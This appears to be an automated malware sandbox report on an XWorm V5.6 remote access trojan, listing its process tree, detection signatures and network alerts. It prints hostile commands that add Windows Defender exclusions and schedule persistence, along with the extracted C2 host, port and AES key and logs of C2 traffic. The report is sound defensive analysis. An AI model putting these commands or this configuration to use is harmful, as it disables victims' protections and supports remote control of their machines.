Windows Analysis Report
YPzNsfg4nR.exe

Overview

General Information

Sample name: YPzNsfg4nR.exe (renamed because original name is a hash value)
Original sample name: 691c8281d68680d1f8966d657bfbcf4d100c7a70d6894493946793cc320623a6.exe
Analysis ID: 1585127
MD5: 47f35ed89ba0b7756cc4d268e7516f55
SHA1: 714b90afdccaee669f5e2edd1b8680c4631cffa0
SHA256: 691c8281d68680d1f8966d657bfbcf4d100c7a70d6894493946793cc320623a6
Tags: exe, user-zhuzhu0009

Detection

XWorm
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Check if machine is in data center or colocation facility
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Protects its processes via BreakOnTermination flag
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses schtasks.exe or at.exe to add and modify task schedules
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file does not import any functions
Queries disk information (often used to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Stores files to the Windows start menu directory
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • YPzNsfg4nR.exe (PID: 7332 cmdline: "C:\Users\user\Desktop\YPzNsfg4nR.exe" MD5: 47F35ED89BA0B7756CC4D268E7516F55)
    • conhost.exe (PID: 7340 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • 24572628.exe (PID: 7544 cmdline: "C:\Users\user\Desktop\24572628.exe" MD5: FFD51738DC3483954A7BCDFAF713DB10)
      • powershell.exe (PID: 7704 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\24572628.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7712 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 8008 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '24572628.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 8016 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 2504 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\coding' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 3628 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 4308 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'coding' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 4288 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 7536 cmdline: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "coding" /tr "C:\ProgramData\coding" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
        • conhost.exe (PID: 7336 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • coding (PID: 5384 cmdline: C:\ProgramData\coding MD5: FFD51738DC3483954A7BCDFAF713DB10)
  • OpenWith.exe (PID: 7752 cmdline: C:\Windows\system32\OpenWith.exe -Embedding MD5: E4A834784FA08C17D47A1E72429C5109)
  • svchost.exe (PID: 7736 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • OpenWith.exe (PID: 3536 cmdline: C:\Windows\system32\OpenWith.exe -Embedding MD5: E4A834784FA08C17D47A1E72429C5109)
  • coding (PID: 8084 cmdline: C:\ProgramData\coding MD5: FFD51738DC3483954A7BCDFAF713DB10)
  • cleanup

Malware Configuration

{"C2 url": ["usb-alignment.gl.at.ply.gg"], "Port": 39219, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}

Yara Matches (Dropped Files)

Source | Rule | Description | Author | Strings
C:\ProgramData\coding | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
C:\ProgramData\coding | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security
C:\ProgramData\coding | rat_win_xworm_v3 | Finds XWorm (version XClient, v3) samples based on characteristic strings | Sekoia.io
  • 0xcc77:$str01: $VB$Local_Port
  • 0xccc0:$str02: $VB$Local_Host
  • 0xaf88:$str03: get_Jpeg
  • 0xb5d4:$str04: get_ServicePack
  • 0xe748:$str05: Select * from AntivirusProduct
  • 0xf0a6:$str06: PCRestart
  • 0xf0ba:$str07: shutdown.exe /f /r /t 0
  • 0xf16c:$str08: StopReport
  • 0xf142:$str09: StopDDos
  • 0xf238:$str10: sendPlugin
  • 0xf3b8:$str12: -ExecutionPolicy Bypass -File "
  • 0xfd04:$str13: Content-length: 5235
C:\ProgramData\coding | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  • 0xe16c:$s6: VirtualBox
  • 0xe0ca:$s8: Win32_ComputerSystem
  • 0x10c19:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x10cb6:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x10dcb:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0xfc1f:$cnc4: POST / HTTP/1.1
C:\Users\user\Desktop\24572628.exe | JoeSecurity_XWorm | Yara detected XWorm | Joe Security

Yara Matches (Memory Dumps)

Source | Rule | Description | Author | Strings
00000003.00000000.2221776118.0000000000342000.00000002.00000001.01000000.00000006.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
00000003.00000000.2221776118.0000000000342000.00000002.00000001.01000000.00000006.sdmp | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  • 0xdf6c:$s6: VirtualBox
  • 0xdeca:$s8: Win32_ComputerSystem
  • 0x10a19:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x10ab6:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x10bcb:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0xfa1f:$cnc4: POST / HTTP/1.1
00000000.00000002.2273726750.00000208000A5000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
00000000.00000002.2273726750.00000208000A5000.00000004.00000800.00020000.00000000.sdmp | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  • 0xfdb4:$s6: VirtualBox
  • 0xfd12:$s8: Win32_ComputerSystem
  • 0x12861:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x128fe:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x12a13:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x11867:$cnc4: POST / HTTP/1.1
00000003.00000002.3428603021.00000000025E1000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security

Yara Matches (Unpacked PEs)

Source | Rule | Description | Author | Strings
3.0.24572628.exe.340000.0.unpack | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
3.0.24572628.exe.340000.0.unpack | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security
3.0.24572628.exe.340000.0.unpack | rat_win_xworm_v3 | Finds XWorm (version XClient, v3) samples based on characteristic strings | Sekoia.io
  • 0xcc77:$str01: $VB$Local_Port
  • 0xccc0:$str02: $VB$Local_Host
  • 0xaf88:$str03: get_Jpeg
  • 0xb5d4:$str04: get_ServicePack
  • 0xe748:$str05: Select * from AntivirusProduct
  • 0xf0a6:$str06: PCRestart
  • 0xf0ba:$str07: shutdown.exe /f /r /t 0
  • 0xf16c:$str08: StopReport
  • 0xf142:$str09: StopDDos
  • 0xf238:$str10: sendPlugin
  • 0xf3b8:$str12: -ExecutionPolicy Bypass -File "
  • 0xfd04:$str13: Content-length: 5235
3.0.24572628.exe.340000.0.unpack | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  • 0xe16c:$s6: VirtualBox
  • 0xe0ca:$s8: Win32_ComputerSystem
  • 0x10c19:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x10cb6:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x10dcb:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0xfc1f:$cnc4: POST / HTTP/1.1
0.2.YPzNsfg4nR.exe.208000a6c48.0.raw.unpack | JoeSecurity_XWorm | Yara detected XWorm | Joe Security

                    System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\24572628.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\24572628.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\24572628.exe", ParentImage: C:\Users\user\Desktop\24572628.exe, ParentProcessId: 7544, ParentProcessName: 24572628.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\24572628.exe', ProcessId: 7704, ProcessName: powershell.exe
Source: Process started | Author: frack113 | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\24572628.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\24572628.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\24572628.exe", ParentImage: C:\Users\user\Desktop\24572628.exe, ParentProcessId: 7544, ParentProcessName: 24572628.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\24572628.exe', ProcessId: 7704, ProcessName: powershell.exe
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: C:\ProgramData\coding, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\24572628.exe, ProcessId: 7544, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\coding
Source: Process started | Author: Max Altgelt (Nextron Systems) | Data: Command: C:\ProgramData\coding, CommandLine: C:\ProgramData\coding, CommandLine|base64offset|contains: , Image: C:\ProgramData\coding, NewProcessName: C:\ProgramData\coding, OriginalFileName: C:\ProgramData\coding, ParentCommandLine: , ParentImage: , ParentProcessId: 1068, ProcessCommandLine: C:\ProgramData\coding, ProcessId: 5384, ProcessName: coding
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\24572628.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\24572628.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\24572628.exe", ParentImage: C:\Users\user\Desktop\24572628.exe, ParentProcessId: 7544, ParentProcessName: 24572628.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\24572628.exe', ProcessId: 7704, ProcessName: powershell.exe
Source: File created | Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) | Data: EventID: 11, Image: C:\Users\user\Desktop\24572628.exe, ProcessId: 7544, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coding.lnk
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\24572628.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\24572628.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\24572628.exe", ParentImage: C:\Users\user\Desktop\24572628.exe, ParentProcessId: 7544, ParentProcessName: 24572628.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\24572628.exe', ProcessId: 7704, ProcessName: powershell.exe
Source: Process started | Author: vburov | Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7736, ProcessName: svchost.exe

Suricata IDS Alerts

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-07T06:02:05.111357+0100 | 2855924 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 50007 | 147.185.221.21 | 39219 | TCP

                    AV Detection

Source: usb-alignment.gl.at.ply.gg | Avira URL Cloud: Label: malware
Source: C:\ProgramData\coding | Avira: detection malicious, Label: TR/Spy.Gen
Source: C:\Users\user\Desktop\24572628.exe | Avira: detection malicious, Label: TR/Spy.Gen
Source: 00000003.00000002.3428603021.00000000025E1000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: Xworm {"C2 url": ["usb-alignment.gl.at.ply.gg"], "Port": 39219, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
Source: C:\ProgramData\coding | ReversingLabs: Detection: 91%
Source: C:\Users\user\Desktop\24572628.exe | ReversingLabs: Detection: 91%
Source: YPzNsfg4nR.exe | Virustotal: Detection: 16%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\ProgramData\coding | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\24572628.exe | Joe Sandbox ML: detected
Source: YPzNsfg4nR.exe | Joe Sandbox ML: detected
Source: 00000003.00000000.2221776118.0000000000342000.00000002.00000001.01000000.00000006.sdmp | String decryptor: usb-alignment.gl.at.ply.gg
Source: 00000003.00000000.2221776118.0000000000342000.00000002.00000001.01000000.00000006.sdmp | String decryptor: 39219
Source: 00000003.00000000.2221776118.0000000000342000.00000002.00000001.01000000.00000006.sdmp | String decryptor: <123456789>
Source: 00000003.00000000.2221776118.0000000000342000.00000002.00000001.01000000.00000006.sdmp | String decryptor: <Xwormmm>
Source: 00000003.00000000.2221776118.0000000000342000.00000002.00000001.01000000.00000006.sdmp | String decryptor: XWorm V5.6
Source: 00000003.00000000.2221776118.0000000000342000.00000002.00000001.01000000.00000006.sdmp | String decryptor: USB.exe
Source: 00000003.00000000.2221776118.0000000000342000.00000002.00000001.01000000.00000006.sdmp | String decryptor: %ProgramData%
Source: 00000003.00000000.2221776118.0000000000342000.00000002.00000001.01000000.00000006.sdmp | String decryptor: coding
Source: YPzNsfg4nR.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: \ConsoleApp4\obj\Release\net4.8\win-x64\1fht7W0d34QhN.pdbSHA256J source: YPzNsfg4nR.exe
                    Source: Binary string: \ConsoleApp4\obj\Release\net4.8\win-x64\1fht7W0d34QhN.pdb source: YPzNsfg4nR.exe

                    Networking

Source: Network traffic | Suricata IDS: 2853193 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.5:49999 -> 147.185.221.21:39219
Source: Network traffic | Suricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.5:50007 -> 147.185.221.21:39219
Source: Malware configuration extractor | URLs: usb-alignment.gl.at.ply.gg
Source: Yara match | File source: 3.0.24572628.exe.340000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.YPzNsfg4nR.exe.208000a6c48.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: C:\ProgramData\coding, type: DROPPED
Source: Yara match | File source: C:\Users\user\Desktop\24572628.exe, type: DROPPED
Source: global traffic | TCP traffic: 192.168.2.5:49999 -> 147.185.221.21:39219
Source: global traffic | HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1  Host: ip-api.com  Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 208.95.112.1
Source: Joe Sandbox View | IP Address: 147.185.221.21
Source: Joe Sandbox View | ASN Name: SALSGIVERUS
Source: unknown | DNS query: name: ip-api.com
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1  Host: ip-api.com  Connection: Keep-Alive
Source: global traffic | DNS traffic detected: DNS query: ip-api.com
Source: global traffic | DNS traffic detected: DNS query: usb-alignment.gl.at.ply.gg
Source: powershell.exe, 00000008.00000002.2481707420.000001A2F4839000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.m
Source: powershell.exe, 0000000B.00000002.2641179501.0000021EE87F9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.mic
Source: powershell.exe, 0000000B.00000002.2641179501.0000021EE87F9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.micft.cMicRosof
Source: powershell.exe, 00000008.00000002.2481707420.000001A2F4839000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.micros
Source: svchost.exe, 00000013.00000002.3423579528.00000284AE4BF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.ver)
Source: qmgr.db.19.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: qmgr.db.19.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.19.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: qmgr.db.19.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: qmgr.db.19.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: qmgr.db.19.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: qmgr.db.19.dr | String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: YPzNsfg4nR.exe, 00000000.00000002.2273726750.00000208000A5000.00000004.00000800.00020000.00000000.sdmp, 24572628.exe, 00000003.00000000.2221776118.0000000000342000.00000002.00000001.01000000.00000006.sdmp, 24572628.exe, 00000003.00000002.3428603021.00000000025E1000.00000004.00000800.00020000.00000000.sdmp, coding.3.dr, 24572628.exe.0.dr | String found in binary or memory: http://ip-api.com/line/?fields=hosting
Source: powershell.exe, 00000004.00000002.2349698693.0000017045FE5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2458610974.000001A290075000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2614120753.0000021EE0183000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2829582139.000001C115352000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000000D.00000002.2688484901.000001C10557B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000004.00000002.2331273020.0000017036199000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2393482194.000001A280228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2520104597.0000021ED0339000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2688484901.000001C10557B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: 24572628.exe, 00000003.00000002.3428603021.00000000025E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2331273020.0000017035F71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2393482194.000001A280001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2520104597.0000021ED0111000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2688484901.000001C1052E1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000004.00000002.2331273020.0000017036199000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2393482194.000001A280228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2520104597.0000021ED0339000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2688484901.000001C10557B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 0000000D.00000002.2688484901.000001C10557B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 0000000B.00000002.2639330504.0000021EE8762000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.micom/pkiops/Docs/ry.htm0
Source: powershell.exe, 00000008.00000002.2481707420.000001A2F4839000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.microsoft.c
Source: powershell.exe, 00000004.00000002.2331273020.0000017035F71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2393482194.000001A280001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2520104597.0000021ED0111000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2688484901.000001C1052E1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 0000000D.00000002.2829582139.000001C115352000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000D.00000002.2829582139.000001C115352000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000D.00000002.2829582139.000001C115352000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
Source: edb.log.19.dr, qmgr.db.19.dr | String found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
Source: svchost.exe, 00000013.00000003.3002178502.00000284B3A70000.00000004.00000800.00020000.00000000.sdmp, edb.log.19.dr, qmgr.db.19.dr | String found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
Source: powershell.exe, 0000000D.00000002.2688484901.000001C10557B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 0000000B.00000002.2639330504.0000021EE878B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ion=v4.5n
Source: powershell.exe, 00000004.00000002.2349698693.0000017045FE5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2458610974.000001A290075000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2614120753.0000021EE0183000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2829582139.000001C115352000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
Source: qmgr.db.19.dr | String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe/C:

                    Operating System Destruction

Source: C:\Users\user\Desktop\24572628.exe | Process information set: 01 00 00 00

                    System Summary

                    barindex
Source: 3.0.24572628.exe.340000.0.unpack, type: UNPACKEDPE | Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 3.0.24572628.exe.340000.0.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
